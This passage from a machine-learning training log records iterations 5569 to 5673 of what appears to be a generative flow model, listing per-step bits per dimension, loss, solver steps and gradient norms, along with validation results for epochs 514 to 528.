446(448.13) | Grad Norm 0.1146(0.0872) | Total Time 10.00(10.00)\nIter 5569 | Time 40.9758(40.6459) | Bit/dim 1.0739(1.0750) | Xent 0.0000(0.0000) | Loss 1.0739(1.0750) | Error 0.0000(0.0000) Steps 446(448.06) | Grad Norm 0.0996(0.0876) | Total Time 10.00(10.00)\nIter 5570 | Time 39.1530(40.6011) | Bit/dim 1.0722(1.0749) | Xent 0.0000(0.0000) | Loss 1.0722(1.0749) | Error 0.0000(0.0000) Steps 452(448.18) | Grad Norm 0.0825(0.0874) | Total Time 10.00(10.00)\nIter 5571 | Time 39.9157(40.5805) | Bit/dim 1.0748(1.0749) | Xent 0.0000(0.0000) | Loss 1.0748(1.0749) | Error 0.0000(0.0000) Steps 446(448.12) | Grad Norm 0.0625(0.0867) | Total Time 10.00(10.00)\nIter 5572 | Time 41.2260(40.5999) | Bit/dim 1.0782(1.0750) | Xent 0.0000(0.0000) | Loss 1.0782(1.0750) | Error 0.0000(0.0000) Steps 446(448.05) | Grad Norm 0.0536(0.0857) | Total Time 10.00(10.00)\nIter 5573 | Time 39.8142(40.5763) | Bit/dim 1.0732(1.0749) | Xent 0.0000(0.0000) | Loss 1.0732(1.0749) | Error 0.0000(0.0000) Steps 452(448.17) | Grad Norm 0.0991(0.0861) | Total Time 10.00(10.00)\nIter 5574 | Time 41.7581(40.6118) | Bit/dim 1.0770(1.0750) | Xent 0.0000(0.0000) | Loss 1.0770(1.0750) | Error 0.0000(0.0000) Steps 452(448.29) | Grad Norm 0.0682(0.0856) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0514 | Time 15.3061, Epoch Time 311.4969(311.1866), Bit/dim 1.0699(best: 1.0695), Xent 0.0000, Loss 1.0699, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5575 | Time 41.6517(40.6430) | Bit/dim 1.0751(1.0750) | Xent 0.0000(0.0000) | Loss 1.0751(1.0750) | Error 0.0000(0.0000) Steps 452(448.40) | Grad Norm 0.0927(0.0858) | Total Time 10.00(10.00)\nIter 5576 | Time 39.3434(40.6040) | Bit/dim 1.0686(1.0748) | Xent 0.0000(0.0000) | Loss 1.0686(1.0748) | Error 0.0000(0.0000) Steps 446(448.32) | Grad Norm 0.0521(0.0848) | Total Time 10.00(10.00)\nIter 5577 | Time 40.2133(40.5923) | Bit/dim 1.0757(1.0748) | Xent 0.0000(0.0000) | Loss 1.0757(1.0748) | Error 0.0000(0.0000) Steps 446(448.25) | Grad Norm 0.1125(0.0856) | Total Time 10.00(10.00)\nIter 5578 | Time 39.3771(40.5558) | Bit/dim 1.0752(1.0748) | Xent 0.0000(0.0000) | Loss 1.0752(1.0748) | Error 0.0000(0.0000) Steps 452(448.37) | Grad Norm 0.0645(0.0850) | Total Time 10.00(10.00)\nIter 5579 | Time 40.4065(40.5513) | Bit/dim 1.0766(1.0749) | Xent 0.0000(0.0000) | Loss 1.0766(1.0749) | Error 0.0000(0.0000) Steps 452(448.48) | Grad Norm 0.0565(0.0841) | Total Time 10.00(10.00)\nIter 5580 | Time 42.6873(40.6154) | Bit/dim 1.0741(1.0749) | Xent 0.0000(0.0000) | Loss 1.0741(1.0749) | Error 0.0000(0.0000) Steps 446(448.40) | Grad Norm 0.0564(0.0833) | Total Time 10.00(10.00)\nIter 5581 | Time 39.5826(40.5844) | Bit/dim 1.0787(1.0750) | Xent 0.0000(0.0000) | Loss 1.0787(1.0750) | Error 0.0000(0.0000) Steps 452(448.51) | Grad Norm 0.0649(0.0827) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0515 | Time 15.2251, Epoch Time 311.1319(311.1850), Bit/dim 1.0697(best: 1.0695), Xent 0.0000, Loss 1.0697, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5582 | Time 41.3018(40.6059) | Bit/dim 1.0752(1.0750) | Xent 0.0000(0.0000) | Loss 1.0752(1.0750) | Error 0.0000(0.0000) Steps 446(448.43) | Grad Norm 0.0578(0.0820) | Total Time 10.00(10.00)\nIter 5583 | Time 41.5555(40.6344) | Bit/dim 1.0759(1.0750) | Xent 0.0000(0.0000) | Loss 1.0759(1.0750) | Error 0.0000(0.0000) Steps 446(448.36) | Grad Norm 0.1080(0.0828) | Total Time 10.00(10.00)\nIter 5584 | Time 40.4068(40.6276) | Bit/dim 1.0779(1.0751) | Xent 0.0000(0.0000) | Loss 1.0779(1.0751) | Error 0.0000(0.0000) Steps 452(448.47) | Grad Norm 0.0748(0.0825) | Total Time 10.00(10.00)\nIter 5585 | Time 39.8110(40.6031) | Bit/dim 1.0750(1.0751) | Xent 0.0000(0.0000) | Loss 1.0750(1.0751) | Error 0.0000(0.0000) Steps 446(448.40) | Grad Norm 0.0659(0.0820) | Total Time 10.00(10.00)\nIter 5586 | Time 41.4468(40.6284) | Bit/dim 1.0743(1.0751) | Xent 0.0000(0.0000) | Loss 1.0743(1.0751) | Error 0.0000(0.0000) Steps 446(448.32) | Grad Norm 0.0616(0.0814) | Total Time 10.00(10.00)\nIter 5587 | Time 41.3074(40.6488) | Bit/dim 1.0749(1.0751) | Xent 0.0000(0.0000) | Loss 1.0749(1.0751) | Error 0.0000(0.0000) Steps 446(448.25) | Grad Norm 0.0534(0.0806) | Total Time 10.00(10.00)\nIter 5588 | Time 39.1420(40.6036) | Bit/dim 1.0720(1.0750) | Xent 0.0000(0.0000) | Loss 1.0720(1.0750) | Error 0.0000(0.0000) Steps 452(448.37) | Grad Norm 0.0599(0.0800) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0516 | Time 15.2061, Epoch Time 312.7538(311.2320), Bit/dim 1.0694(best: 1.0695), Xent 0.0000, Loss 1.0694, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5589 | Time 39.5718(40.5726) | Bit/dim 1.0742(1.0750) | Xent 0.0000(0.0000) | Loss 1.0742(1.0750) | Error 0.0000(0.0000) Steps 446(448.30) | Grad Norm 0.0658(0.0795) | Total Time 10.00(10.00)\nIter 5590 | Time 38.6462(40.5148) | Bit/dim 1.0747(1.0750) | Xent 0.0000(0.0000) | Loss 1.0747(1.0750) | Error 0.0000(0.0000) Steps 446(448.23) | Grad Norm 0.0871(0.0798) | Total Time 10.00(10.00)\nIter 5591 | Time 39.9887(40.4990) | Bit/dim 1.0801(1.0751) | Xent 0.0000(0.0000) | Loss 1.0801(1.0751) | Error 0.0000(0.0000) Steps 446(448.16) | Grad Norm 0.0613(0.0792) | Total Time 10.00(10.00)\nIter 5592 | Time 40.5196(40.4997) | Bit/dim 1.0736(1.0751) | Xent 0.0000(0.0000) | Loss 1.0736(1.0751) | Error 0.0000(0.0000) Steps 452(448.28) | Grad Norm 0.0672(0.0788) | Total Time 10.00(10.00)\nIter 5593 | Time 41.1056(40.5178) | Bit/dim 1.0754(1.0751) | Xent 0.0000(0.0000) | Loss 1.0754(1.0751) | Error 0.0000(0.0000) Steps 452(448.39) | Grad Norm 0.0590(0.0782) | Total Time 10.00(10.00)\nIter 5594 | Time 42.8140(40.5867) | Bit/dim 1.0765(1.0751) | Xent 0.0000(0.0000) | Loss 1.0765(1.0751) | Error 0.0000(0.0000) Steps 452(448.50) | Grad Norm 0.0788(0.0783) | Total Time 10.00(10.00)\nIter 5595 | Time 41.5721(40.6163) | Bit/dim 1.0692(1.0749) | Xent 0.0000(0.0000) | Loss 1.0692(1.0749) | Error 0.0000(0.0000) Steps 446(448.42) | Grad Norm 0.0775(0.0782) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0517 | Time 15.1052, Epoch Time 311.8550(311.2507), Bit/dim 1.0697(best: 1.0694), Xent 0.0000, Loss 1.0697, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5596 | Time 39.4375(40.5809) | Bit/dim 1.0749(1.0749) | Xent 0.0000(0.0000) | Loss 1.0749(1.0749) | Error 0.0000(0.0000) Steps 452(448.53) | Grad Norm 0.0538(0.0775) | Total Time 10.00(10.00)\nIter 5597 | Time 41.1393(40.5977) | Bit/dim 1.0758(1.0750) | Xent 0.0000(0.0000) | Loss 1.0758(1.0750) | Error 0.0000(0.0000) Steps 446(448.45) | Grad Norm 0.0812(0.0776) | Total Time 10.00(10.00)\nIter 5598 | Time 41.3240(40.6195) | Bit/dim 1.0758(1.0750) | Xent 0.0000(0.0000) | Loss 1.0758(1.0750) | Error 0.0000(0.0000) Steps 452(448.56) | Grad Norm 0.0720(0.0774) | Total Time 10.00(10.00)\nIter 5599 | Time 39.3977(40.5828) | Bit/dim 1.0723(1.0749) | Xent 0.0000(0.0000) | Loss 1.0723(1.0749) | Error 0.0000(0.0000) Steps 446(448.48) | Grad Norm 0.0713(0.0773) | Total Time 10.00(10.00)\nIter 5600 | Time 39.4924(40.5501) | Bit/dim 1.0749(1.0749) | Xent 0.0000(0.0000) | Loss 1.0749(1.0749) | Error 0.0000(0.0000) Steps 452(448.59) | Grad Norm 0.0704(0.0771) | Total Time 10.00(10.00)\nIter 5601 | Time 39.7849(40.5271) | Bit/dim 1.0694(1.0747) | Xent 0.0000(0.0000) | Loss 1.0694(1.0747) | Error 0.0000(0.0000) Steps 446(448.51) | Grad Norm 0.0785(0.0771) | Total Time 10.00(10.00)\nIter 5602 | Time 40.6753(40.5316) | Bit/dim 1.0775(1.0748) | Xent 0.0000(0.0000) | Loss 1.0775(1.0748) | Error 0.0000(0.0000) Steps 452(448.61) | Grad Norm 0.0721(0.0770) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0518 | Time 15.0366, Epoch Time 308.9380(311.1813), Bit/dim 1.0701(best: 1.0694), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5603 | Time 40.9719(40.5448) | Bit/dim 1.0737(1.0748) | Xent 0.0000(0.0000) | Loss 1.0737(1.0748) | Error 0.0000(0.0000) Steps 446(448.54) | Grad Norm 0.0765(0.0769) | Total Time 10.00(10.00)\nIter 5604 | Time 39.9728(40.5276) | Bit/dim 1.0757(1.0748) | Xent 0.0000(0.0000) | Loss 1.0757(1.0748) | Error 0.0000(0.0000) Steps 452(448.64) | Grad Norm 0.0556(0.0763) | Total Time 10.00(10.00)\nIter 5605 | Time 39.4942(40.4966) | Bit/dim 1.0790(1.0749) | Xent 0.0000(0.0000) | Loss 1.0790(1.0749) | Error 0.0000(0.0000) Steps 452(448.74) | Grad Norm 0.0486(0.0755) | Total Time 10.00(10.00)\nIter 5606 | Time 40.5491(40.4982) | Bit/dim 1.0724(1.0749) | Xent 0.0000(0.0000) | Loss 1.0724(1.0749) | Error 0.0000(0.0000) Steps 446(448.66) | Grad Norm 0.1128(0.0766) | Total Time 10.00(10.00)\nIter 5607 | Time 39.4079(40.4655) | Bit/dim 1.0742(1.0748) | Xent 0.0000(0.0000) | Loss 1.0742(1.0748) | Error 0.0000(0.0000) Steps 452(448.76) | Grad Norm 0.0799(0.0767) | Total Time 10.00(10.00)\nIter 5608 | Time 39.8195(40.4461) | Bit/dim 1.0769(1.0749) | Xent 0.0000(0.0000) | Loss 1.0769(1.0749) | Error 0.0000(0.0000) Steps 446(448.68) | Grad Norm 0.0504(0.0759) | Total Time 10.00(10.00)\nIter 5609 | Time 40.8511(40.4583) | Bit/dim 1.0726(1.0748) | Xent 0.0000(0.0000) | Loss 1.0726(1.0748) | Error 0.0000(0.0000) Steps 446(448.60) | Grad Norm 0.0736(0.0758) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0519 | Time 15.2648, Epoch Time 308.7145(311.1073), Bit/dim 1.0688(best: 1.0694), Xent 0.0000, Loss 1.0688, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5610 | Time 40.8455(40.4699) | Bit/dim 1.0748(1.0748) | Xent 0.0000(0.0000) | Loss 1.0748(1.0748) | Error 0.0000(0.0000) Steps 452(448.70) | Grad Norm 0.0882(0.0762) | Total Time 10.00(10.00)\nIter 5611 | Time 41.2509(40.4933) | Bit/dim 1.0720(1.0747) | Xent 0.0000(0.0000) | Loss 1.0720(1.0747) | Error 0.0000(0.0000) Steps 446(448.62) | Grad Norm 0.0530(0.0755) | Total Time 10.00(10.00)\nIter 5612 | Time 40.0117(40.4789) | Bit/dim 1.0748(1.0748) | Xent 0.0000(0.0000) | Loss 1.0748(1.0748) | Error 0.0000(0.0000) Steps 446(448.54) | Grad Norm 0.0860(0.0758) | Total Time 10.00(10.00)\nIter 5613 | Time 39.9882(40.4641) | Bit/dim 1.0730(1.0747) | Xent 0.0000(0.0000) | Loss 1.0730(1.0747) | Error 0.0000(0.0000) Steps 446(448.46) | Grad Norm 0.1196(0.0771) | Total Time 10.00(10.00)\nIter 5614 | Time 41.8756(40.5065) | Bit/dim 1.0781(1.0748) | Xent 0.0000(0.0000) | Loss 1.0781(1.0748) | Error 0.0000(0.0000) Steps 452(448.57) | Grad Norm 0.0892(0.0775) | Total Time 10.00(10.00)\nIter 5615 | Time 41.0691(40.5234) | Bit/dim 1.0749(1.0748) | Xent 0.0000(0.0000) | Loss 1.0749(1.0748) | Error 0.0000(0.0000) Steps 446(448.49) | Grad Norm 0.0622(0.0770) | Total Time 10.00(10.00)\nIter 5616 | Time 40.2320(40.5146) | Bit/dim 1.0703(1.0747) | Xent 0.0000(0.0000) | Loss 1.0703(1.0747) | Error 0.0000(0.0000) Steps 446(448.42) | Grad Norm 0.1514(0.0793) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0520 | Time 15.2061, Epoch Time 313.2279(311.1710), Bit/dim 1.0691(best: 1.0688), Xent 0.0000, Loss 1.0691, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5617 | Time 40.3390(40.5094) | Bit/dim 1.0767(1.0747) | Xent 0.0000(0.0000) | Loss 1.0767(1.0747) | Error 0.0000(0.0000) Steps 446(448.34) | Grad Norm 0.0786(0.0792) | Total Time 10.00(10.00)\nIter 5618 | Time 39.7687(40.4871) | Bit/dim 1.0759(1.0748) | Xent 0.0000(0.0000) | Loss 1.0759(1.0748) | Error 0.0000(0.0000) Steps 452(448.45) | Grad Norm 0.0746(0.0791) | Total Time 10.00(10.00)\nIter 5619 | Time 40.8460(40.4979) | Bit/dim 1.0714(1.0747) | Xent 0.0000(0.0000) | Loss 1.0714(1.0747) | Error 0.0000(0.0000) Steps 452(448.56) | Grad Norm 0.0935(0.0795) | Total Time 10.00(10.00)\nIter 5620 | Time 41.1118(40.5163) | Bit/dim 1.0782(1.0748) | Xent 0.0000(0.0000) | Loss 1.0782(1.0748) | Error 0.0000(0.0000) Steps 452(448.66) | Grad Norm 0.1093(0.0804) | Total Time 10.00(10.00)\nIter 5621 | Time 41.5094(40.5461) | Bit/dim 1.0739(1.0747) | Xent 0.0000(0.0000) | Loss 1.0739(1.0747) | Error 0.0000(0.0000) Steps 446(448.58) | Grad Norm 0.0602(0.0798) | Total Time 10.00(10.00)\nIter 5622 | Time 39.9697(40.5288) | Bit/dim 1.0721(1.0747) | Xent 0.0000(0.0000) | Loss 1.0721(1.0747) | Error 0.0000(0.0000) Steps 452(448.69) | Grad Norm 0.0682(0.0795) | Total Time 10.00(10.00)\nIter 5623 | Time 42.8069(40.5972) | Bit/dim 1.0732(1.0746) | Xent 0.0000(0.0000) | Loss 1.0732(1.0746) | Error 0.0000(0.0000) Steps 452(448.79) | Grad Norm 0.0605(0.0789) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0521 | Time 14.9812, Epoch Time 313.8769(311.2521), Bit/dim 1.0696(best: 1.0688), Xent 0.0000, Loss 1.0696, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5624 | Time 39.9781(40.5786) | Bit/dim 1.0715(1.0745) | Xent 0.0000(0.0000) | Loss 1.0715(1.0745) | Error 0.0000(0.0000) Steps 446(448.70) | Grad Norm 0.0619(0.0784) | Total Time 10.00(10.00)\nIter 5625 | Time 39.3893(40.5429) | Bit/dim 1.0750(1.0745) | Xent 0.0000(0.0000) | Loss 1.0750(1.0745) | Error 0.0000(0.0000) Steps 446(448.62) | Grad Norm 0.0788(0.0784) | Total Time 10.00(10.00)\nIter 5626 | Time 39.5619(40.5135) | Bit/dim 1.0755(1.0746) | Xent 0.0000(0.0000) | Loss 1.0755(1.0746) | Error 0.0000(0.0000) Steps 446(448.54) | Grad Norm 0.0588(0.0778) | Total Time 10.00(10.00)\nIter 5627 | Time 41.8333(40.5531) | Bit/dim 1.0729(1.0745) | Xent 0.0000(0.0000) | Loss 1.0729(1.0745) | Error 0.0000(0.0000) Steps 446(448.47) | Grad Norm 0.0690(0.0776) | Total Time 10.00(10.00)\nIter 5628 | Time 41.1625(40.5714) | Bit/dim 1.0736(1.0745) | Xent 0.0000(0.0000) | Loss 1.0736(1.0745) | Error 0.0000(0.0000) Steps 446(448.39) | Grad Norm 0.0599(0.0770) | Total Time 10.00(10.00)\nIter 5629 | Time 41.2127(40.5906) | Bit/dim 1.0755(1.0745) | Xent 0.0000(0.0000) | Loss 1.0755(1.0745) | Error 0.0000(0.0000) Steps 446(448.32) | Grad Norm 0.1234(0.0784) | Total Time 10.00(10.00)\nIter 5630 | Time 40.2299(40.5798) | Bit/dim 1.0783(1.0746) | Xent 0.0000(0.0000) | Loss 1.0783(1.0746) | Error 0.0000(0.0000) Steps 446(448.25) | Grad Norm 0.0636(0.0780) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0522 | Time 15.1262, Epoch Time 310.8283(311.2394), Bit/dim 1.0696(best: 1.0688), Xent 0.0000, Loss 1.0696, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5631 | Time 40.1405(40.5666) | Bit/dim 1.0731(1.0746) | Xent 0.0000(0.0000) | Loss 1.0731(1.0746) | Error 0.0000(0.0000) Steps 446(448.18) | Grad Norm 0.0625(0.0775) | Total Time 10.00(10.00)\nIter 5632 | Time 40.9049(40.5767) | Bit/dim 1.0768(1.0747) | Xent 0.0000(0.0000) | Loss 1.0768(1.0747) | Error 0.0000(0.0000) Steps 446(448.12) | Grad Norm 0.0681(0.0772) | Total Time 10.00(10.00)\nIter 5633 | Time 40.0418(40.5607) | Bit/dim 1.0708(1.0745) | Xent 0.0000(0.0000) | Loss 1.0708(1.0745) | Error 0.0000(0.0000) Steps 452(448.23) | Grad Norm 0.0743(0.0771) | Total Time 10.00(10.00)\nIter 5634 | Time 41.3977(40.5858) | Bit/dim 1.0739(1.0745) | Xent 0.0000(0.0000) | Loss 1.0739(1.0745) | Error 0.0000(0.0000) Steps 446(448.17) | Grad Norm 0.0611(0.0767) | Total Time 10.00(10.00)\nIter 5635 | Time 41.8872(40.6249) | Bit/dim 1.0771(1.0746) | Xent 0.0000(0.0000) | Loss 1.0771(1.0746) | Error 0.0000(0.0000) Steps 452(448.28) | Grad Norm 0.0783(0.0767) | Total Time 10.00(10.00)\nIter 5636 | Time 39.0435(40.5774) | Bit/dim 1.0737(1.0746) | Xent 0.0000(0.0000) | Loss 1.0737(1.0746) | Error 0.0000(0.0000) Steps 446(448.21) | Grad Norm 0.0713(0.0765) | Total Time 10.00(10.00)\nIter 5637 | Time 39.5552(40.5467) | Bit/dim 1.0729(1.0745) | Xent 0.0000(0.0000) | Loss 1.0729(1.0745) | Error 0.0000(0.0000) Steps 452(448.33) | Grad Norm 0.0918(0.0770) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0523 | Time 15.1721, Epoch Time 310.9314(311.2302), Bit/dim 1.0690(best: 1.0688), Xent 0.0000, Loss 1.0690, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5638 | Time 39.1193(40.5039) | Bit/dim 1.0799(1.0747) | Xent 0.0000(0.0000) | Loss 1.0799(1.0747) | Error 0.0000(0.0000) Steps 446(448.26) | Grad Norm 0.0532(0.0763) | Total Time 10.00(10.00)\nIter 5639 | Time 39.5819(40.4763) | Bit/dim 1.0747(1.0747) | Xent 0.0000(0.0000) | Loss 1.0747(1.0747) | Error 0.0000(0.0000) Steps 446(448.19) | Grad Norm 0.0749(0.0762) | Total Time 10.00(10.00)\nIter 5640 | Time 40.0487(40.4634) | Bit/dim 1.0734(1.0746) | Xent 0.0000(0.0000) | Loss 1.0734(1.0746) | Error 0.0000(0.0000) Steps 452(448.30) | Grad Norm 0.1035(0.0771) | Total Time 10.00(10.00)\nIter 5641 | Time 42.0789(40.5119) | Bit/dim 1.0728(1.0746) | Xent 0.0000(0.0000) | Loss 1.0728(1.0746) | Error 0.0000(0.0000) Steps 446(448.23) | Grad Norm 0.0856(0.0773) | Total Time 10.00(10.00)\nIter 5642 | Time 40.3030(40.5056) | Bit/dim 1.0736(1.0746) | Xent 0.0000(0.0000) | Loss 1.0736(1.0746) | Error 0.0000(0.0000) Steps 446(448.17) | Grad Norm 0.0612(0.0768) | Total Time 10.00(10.00)\nIter 5643 | Time 42.6948(40.5713) | Bit/dim 1.0798(1.0747) | Xent 0.0000(0.0000) | Loss 1.0798(1.0747) | Error 0.0000(0.0000) Steps 458(448.46) | Grad Norm 0.0684(0.0766) | Total Time 10.00(10.00)\nIter 5644 | Time 39.4996(40.5392) | Bit/dim 1.0696(1.0746) | Xent 0.0000(0.0000) | Loss 1.0696(1.0746) | Error 0.0000(0.0000) Steps 452(448.57) | Grad Norm 0.1508(0.0788) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0524 | Time 15.1562, Epoch Time 310.9331(311.2213), Bit/dim 1.0693(best: 1.0688), Xent 0.0000, Loss 1.0693, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5645 | Time 40.5907(40.5407) | Bit/dim 1.0740(1.0745) | Xent 0.0000(0.0000) | Loss 1.0740(1.0745) | Error 0.0000(0.0000) Steps 452(448.67) | Grad Norm 0.1038(0.0796) | Total Time 10.00(10.00)\nIter 5646 | Time 40.9545(40.5531) | Bit/dim 1.0739(1.0745) | Xent 0.0000(0.0000) | Loss 1.0739(1.0745) | Error 0.0000(0.0000) Steps 446(448.59) | Grad Norm 0.0781(0.0795) | Total Time 10.00(10.00)\nIter 5647 | Time 40.5788(40.5539) | Bit/dim 1.0735(1.0745) | Xent 0.0000(0.0000) | Loss 1.0735(1.0745) | Error 0.0000(0.0000) Steps 452(448.69) | Grad Norm 0.0521(0.0787) | Total Time 10.00(10.00)\nIter 5648 | Time 40.0881(40.5399) | Bit/dim 1.0726(1.0744) | Xent 0.0000(0.0000) | Loss 1.0726(1.0744) | Error 0.0000(0.0000) Steps 452(448.79) | Grad Norm 0.2237(0.0830) | Total Time 10.00(10.00)\nIter 5649 | Time 41.8236(40.5784) | Bit/dim 1.0745(1.0744) | Xent 0.0000(0.0000) | Loss 1.0745(1.0744) | Error 0.0000(0.0000) Steps 446(448.71) | Grad Norm 0.1440(0.0849) | Total Time 10.00(10.00)\nIter 5650 | Time 40.3624(40.5719) | Bit/dim 1.0758(1.0745) | Xent 0.0000(0.0000) | Loss 1.0758(1.0745) | Error 0.0000(0.0000) Steps 446(448.63) | Grad Norm 0.0527(0.0839) | Total Time 10.00(10.00)\nIter 5651 | Time 41.6037(40.6029) | Bit/dim 1.0774(1.0746) | Xent 0.0000(0.0000) | Loss 1.0774(1.0746) | Error 0.0000(0.0000) Steps 446(448.55) | Grad Norm 0.0857(0.0840) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0525 | Time 14.9418, Epoch Time 313.3577(311.2854), Bit/dim 1.0697(best: 1.0688), Xent 0.0000, Loss 1.0697, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5652 | Time 40.3744(40.5960) | Bit/dim 1.0742(1.0746) | Xent 0.0000(0.0000) | Loss 1.0742(1.0746) | Error 0.0000(0.0000) Steps 446(448.47) | Grad Norm 0.1883(0.0871) | Total Time 10.00(10.00)\nIter 5653 | Time 42.0970(40.6411) | Bit/dim 1.0737(1.0745) | Xent 0.0000(0.0000) | Loss 1.0737(1.0745) | Error 0.0000(0.0000) Steps 452(448.58) | Grad Norm 0.1748(0.0897) | Total Time 10.00(10.00)\nIter 5654 | Time 40.5637(40.6388) | Bit/dim 1.0743(1.0745) | Xent 0.0000(0.0000) | Loss 1.0743(1.0745) | Error 0.0000(0.0000) Steps 446(448.50) | Grad Norm 0.0550(0.0887) | Total Time 10.00(10.00)\nIter 5655 | Time 40.9158(40.6471) | Bit/dim 1.0754(1.0746) | Xent 0.0000(0.0000) | Loss 1.0754(1.0746) | Error 0.0000(0.0000) Steps 446(448.43) | Grad Norm 0.1913(0.0918) | Total Time 10.00(10.00)\nIter 5656 | Time 40.8262(40.6524) | Bit/dim 1.0749(1.0746) | Xent 0.0000(0.0000) | Loss 1.0749(1.0746) | Error 0.0000(0.0000) Steps 452(448.53) | Grad Norm 0.1622(0.0939) | Total Time 10.00(10.00)\nIter 5657 | Time 39.0044(40.6030) | Bit/dim 1.0763(1.0746) | Xent 0.0000(0.0000) | Loss 1.0763(1.0746) | Error 0.0000(0.0000) Steps 452(448.64) | Grad Norm 0.0552(0.0927) | Total Time 10.00(10.00)\nIter 5658 | Time 39.1486(40.5594) | Bit/dim 1.0726(1.0746) | Xent 0.0000(0.0000) | Loss 1.0726(1.0746) | Error 0.0000(0.0000) Steps 446(448.56) | Grad Norm 0.0965(0.0928) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0526 | Time 15.2624, Epoch Time 310.6551(311.2664), Bit/dim 1.0691(best: 1.0688), Xent 0.0000, Loss 1.0691, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5659 | Time 41.4983(40.5875) | Bit/dim 1.0756(1.0746) | Xent 0.0000(0.0000) | Loss 1.0756(1.0746) | Error 0.0000(0.0000) Steps 446(448.48) | Grad Norm 0.1529(0.0946) | Total Time 10.00(10.00)\nIter 5660 | Time 41.4265(40.6127) | Bit/dim 1.0698(1.0744) | Xent 0.0000(0.0000) | Loss 1.0698(1.0744) | Error 0.0000(0.0000) Steps 452(448.59) | Grad Norm 0.0844(0.0943) | Total Time 10.00(10.00)\nIter 5661 | Time 41.9409(40.6525) | Bit/dim 1.0704(1.0743) | Xent 0.0000(0.0000) | Loss 1.0704(1.0743) | Error 0.0000(0.0000) Steps 452(448.69) | Grad Norm 0.0606(0.0933) | Total Time 10.00(10.00)\nIter 5662 | Time 39.3347(40.6130) | Bit/dim 1.0782(1.0744) | Xent 0.0000(0.0000) | Loss 1.0782(1.0744) | Error 0.0000(0.0000) Steps 446(448.61) | Grad Norm 0.0824(0.0930) | Total Time 10.00(10.00)\nIter 5663 | Time 41.4873(40.6392) | Bit/dim 1.0758(1.0745) | Xent 0.0000(0.0000) | Loss 1.0758(1.0745) | Error 0.0000(0.0000) Steps 446(448.53) | Grad Norm 0.1443(0.0945) | Total Time 10.00(10.00)\nIter 5664 | Time 41.4566(40.6638) | Bit/dim 1.0754(1.0745) | Xent 0.0000(0.0000) | Loss 1.0754(1.0745) | Error 0.0000(0.0000) Steps 452(448.63) | Grad Norm 0.0916(0.0944) | Total Time 10.00(10.00)\nIter 5665 | Time 40.5012(40.6589) | Bit/dim 1.0738(1.0745) | Xent 0.0000(0.0000) | Loss 1.0738(1.0745) | Error 0.0000(0.0000) Steps 446(448.56) | Grad Norm 0.0611(0.0934) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0527 | Time 15.1268, Epoch Time 315.1811(311.3839), Bit/dim 1.0696(best: 1.0688), Xent 0.0000, Loss 1.0696, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5666 | Time 41.1142(40.6725) | Bit/dim 1.0775(1.0746) | Xent 0.0000(0.0000) | Loss 1.0775(1.0746) | Error 0.0000(0.0000) Steps 452(448.66) | Grad Norm 0.1298(0.0945) | Total Time 10.00(10.00)\nIter 5667 | Time 42.4912(40.7271) | Bit/dim 1.0752(1.0746) | Xent 0.0000(0.0000) | Loss 1.0752(1.0746) | Error 0.0000(0.0000) Steps 446(448.58) | Grad Norm 0.0889(0.0944) | Total Time 10.00(10.00)\nIter 5668 | Time 40.3183(40.7148) | Bit/dim 1.0726(1.0745) | Xent 0.0000(0.0000) | Loss 1.0726(1.0745) | Error 0.0000(0.0000) Steps 446(448.50) | Grad Norm 0.0727(0.0937) | Total Time 10.00(10.00)\nIter 5669 | Time 39.1909(40.6691) | Bit/dim 1.0737(1.0745) | Xent 0.0000(0.0000) | Loss 1.0737(1.0745) | Error 0.0000(0.0000) Steps 446(448.43) | Grad Norm 0.0576(0.0926) | Total Time 10.00(10.00)\nIter 5670 | Time 41.2236(40.6858) | Bit/dim 1.0735(1.0745) | Xent 0.0000(0.0000) | Loss 1.0735(1.0745) | Error 0.0000(0.0000) Steps 452(448.53) | Grad Norm 0.0546(0.0915) | Total Time 10.00(10.00)\nIter 5671 | Time 39.1708(40.6403) | Bit/dim 1.0767(1.0746) | Xent 0.0000(0.0000) | Loss 1.0767(1.0746) | Error 0.0000(0.0000) Steps 446(448.46) | Grad Norm 0.1019(0.0918) | Total Time 10.00(10.00)\nIter 5672 | Time 40.6295(40.6400) | Bit/dim 1.0735(1.0745) | Xent 0.0000(0.0000) | Loss 1.0735(1.0745) | Error 0.0000(0.0000) Steps 452(448.56) | Grad Norm 0.0854(0.0916) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0528 | Time 15.1555, Epoch Time 312.0528(311.4040), Bit/dim 1.0694(best: 1.0688), Xent 0.0000, Loss 1.0694, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5673 | Time 39.9542(40.6194) | Bit/dim 1.0735(1.0745) | Xent 0.0000(0.0000) | 